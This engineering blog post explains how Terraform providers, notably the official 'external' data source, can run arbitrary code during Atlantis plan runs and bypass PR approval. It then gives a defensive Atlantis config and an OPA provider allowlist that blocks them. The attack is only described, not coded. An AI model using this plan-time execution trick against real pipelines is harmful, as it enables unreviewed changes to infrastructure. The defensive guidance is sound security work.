Many organizations use infrastructure-as-code (IaC) with pull request (PR) automation to provide a more secure, safe environment for making infrastructure changes. Despite the power and flexibility of IaC software, the lack of strong, secure defaults in PR automation software can make that sense of security a false one.
Infrastructure-as-code and pull request automation
IaC enables a declarative, reusable, and auditable way to manage configuration changes. At DoorDash, the primary platform for this is Terraform, operated by an account-isolated or specifically configured Atlantis instance running in ECS and backed by GitHub.
This type of configuration can be used to manage a myriad of infrastructure, such as Okta, Stripe, Chronosphere, or AWS. For the purposes of this article, we'll focus on AWS.
A basic workflow for creating an AWS Account could be as simple as creating a new GitHub repository from a template and then issuing a PR against a repository containing the IaC for the account managing the AWS Organization. Atlantis automatically plans on the newly issued PR, and an admin, engineer, or other authorized personnel reviews and approves the proposed changes as appropriate. Upon approval, someone with access to comment on PRs, such as the author or an approver, can leave the comment "atlantis apply," instructing Atlantis to execute the proposed plan and merge the PR upon success.
Because the Atlantis instance is isolated to the specific AWS Account and only executes the plan post-approval, one would assume that this is a safe setup. However...
Bypassing approval
By default, Atlantis dutifully executes terraform plan in directories where changes to specific files, for example *.hcl, have been made. terraform apply cannot be run unless the PR has been approved. Terraform, however, is a flexible and powerful tool. Terraform providers execute code at plan time and can be pulled from outside the public registry. A user with the ability to open PRs could host, fetch, and execute a malicious provider to circumvent PR approval requirements. In fact, such a user wouldn't even need to host a malicious provider. An official provider, external, contains a data source which can be used to tell Atlantis to do pretty much anything.
The troubling fact is that the external data source can execute arbitrary code at plan time with the same privileges and in the same environment as Atlantis, allowing arbitrary changes to be made without any need for review or approval.
Plugging the leak
Atlantis has powerful server-side customization that allows customized default plan and apply workflows, provided it is not configured to allow repositories to provide their own configuration customization. This enables running tools such as Conftest against Open Policy Agent (OPA) policies that define an allowed list of providers before terraform plan is executed. Given the large number of providers available in the Terraform Registry and the means to use providers from unlimited sources, a strict allowlist of providers removes the ability to apply changes or leak environmental data at plan time.
To create such an allowlist, it's important to let Terraform resolve its dependency graph instead of trying to parse required_providers because unapproved providers can be referenced by external modules and their transitive dependencies. Once the dependency graph is resolved with terraform init, all required providers can be found in the dependency lock file alongside version and checksum information. Here is an example server-side config validating an allowlist of providers against the dependency lock file:
repos:
- id: /.*/
branch: /^main$/
apply_requirements: [approved, mergeable]
workflow: opa
workflows:
opa:
plan:
steps:
- init
- run: conftest test --update s3::https://s3.amazonaws.com/bucket/opa-rules --namespace terraform.providers .terraform.lock.hcl
- plan
A starter policy evaluating just the provider source address appears as follows:
package terraform.providers
allowed_providers = {
"registry.terraform.io/hashicorp/aws",
"registry.terraform.io/hashicorp/helm",
"registry.terraform.io/hashicorp/kubernetes",
"registry.terraform.io/hashicorp/vault",
}
deny[msg] {
input.provider[name]
not allowed_providers[name]
msg = sprintf("Provider `%v` not allowed", [name])
}
With version and checksum information available in the dependency lock file, OPA policies could enforce not just certain providers but also non-vulnerable versions and known checksums.
With these precautions, if a bad actor attempts to use the dangerous data source in their HCL, Atlantis will halt before planning:
FAIL - .terraform.lock.hcl - terraform.providers - Provider `registry.terraform.io/hashicorp/external` not allowed
1 tests, 0 passed, 0 warnings, 1 failure, 0 exceptions
The developer experience can be improved by adding a prescriptive error message and defining a process for expanding the provider allowlist. Additionally, a feature can be added to the custom workflow to allow authorized users or groups in GitHub to permit a dangerous plan anyway with a PR comment.
Note that the above implementation relies on the existence of the dependency lock file (.terraform.lock.hcl), which did not exist prior to Terraform 0.14. We recommend enforcing a minimum version of Terraform to prevent downgrade attacks. If you need to support older versions of Terraform, "terraform version" returns provider information starting in 0.11 with JSON output added in 0.13.
Alternative approaches to implementing provider validation include hosting an internal registry and using a network mirror or baking providers into your image and using -plugin-dir.
Stay Informed with Weekly Updates
Subscribe to our Engineering blog to get regular updates on all the coolest projects our team is working on
Please enter a valid email address.
Thank you for Subscribing!
Reducing review fatigue
Such a workflow can require quite a few people to get anything done. Consider: An engineer simply wants to update a configuration property, but everything requires a review. This can grind productivity to a halt and make for an unpleasant work day waiting to do something as simple as increasing a memory limit on an EC2 instance.
With Conftest and OPA, specific resources can be allow- or deny-listed, permitting some specific changes without needing approval while others would be specifically flagged for approval.
Additionally, approval for changes to specific properties can be delegated to non-specialized teams in GitHub by adjusting CODEOWNERS and writing the HCL in such a way that it reads the property values from non-Terraform files such as .txt files. For example:
locals {
users = var.users != null ? var.users : var.read_users_from_file == null ? [] : [for user in split("\n", chomp(file(var.read_users_from_file))) : user if trimspace(user) != "" && substr(trimspace(user), 0, 1) != "#"]
set_users = toset(distinct(local.users))
}
The combination of these two techniques can pre-determine that a number of changes are explicitly safe, significantly reducing the need for review by a team member from security or infrastructure engineering.
Management nightmare
Recall the configuration of Atlantis. For safety, each AWS Account has its own instance of Atlantis so that a misconfigured or compromised instance in one account can't make changes in another account. Each instance runs in Elastic Container Service (ECS) with separately configured containers. Every change to the workflow configuration currently requires a PR. In large AWS Organizations, this can result in a significant number of PRs creating a tedious process.
Presently, Atlantis is tedious to manage en masse. Simplifying this process is a priority, but requires planning. Some design changes can be made to help. For example, workflow configuration can come from a service or source control management system. Additionally, we can create limited-purpose cross-account AWS Identity and Access Management (IAM) Roles to permit updating of all Atlantis ECS Service Task Definitions and Services. Doing so, however, requires planning to limit unknown/unreviewed/unofficial images being used in the Task Definitions as well as monitoring of CloudTrail logs to reduce the chance of unauthorized changes.
Conclusion
Any sufficiently powerful tool is unlikely to come without risk, so it's important to review the functionality of tools and systems in the critical path of a workflow. A misconfigured build environment could lead to remote code execution on a developer or continuous integration (CI) machine. A misconfigured PR automation system could lead to something similar or more unfortunate. Maintaining safe operations calls for addressing critical findings in reviews.
Simple roadblocks may provide security but often lead to fatiguing inefficiencies. Few people will continue to use a secure system that they don't enjoy or that bogs down the entire process. Being mindful of this provides opportunities to explore ways to reduce inefficiency while maintaining excellent security, increasing developer velocity, and reducing fatigue.
Batten down the hatches, full steam ahead!